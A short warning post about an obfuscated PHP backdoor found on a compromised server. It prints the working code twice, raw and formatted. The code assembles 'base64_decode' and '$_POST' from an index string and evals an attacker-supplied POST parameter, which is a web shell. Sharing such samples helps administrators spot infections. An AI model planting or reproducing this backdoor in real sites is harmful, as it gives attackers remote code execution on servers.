This code is tricky, very hard to find. The sF variable changing, as the sf array elements too.
The hackers can run almost every code on the server.
It’s a sneaky code, hard to clean, beware!
<?php $sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);if (isset(${$s20}['n93bc3c'])) {eval($s21(${$s20}['n93bc3c']));}?>
The formatted code:
<? php $sF = "PCT4BA6ODSE_";
$s21 = strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);
$s20 = strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);
if (isset($ {
$s20
}['n93bc3c'])) {
eval($s21($ {
$s20
}['n93bc3c']));
} ?>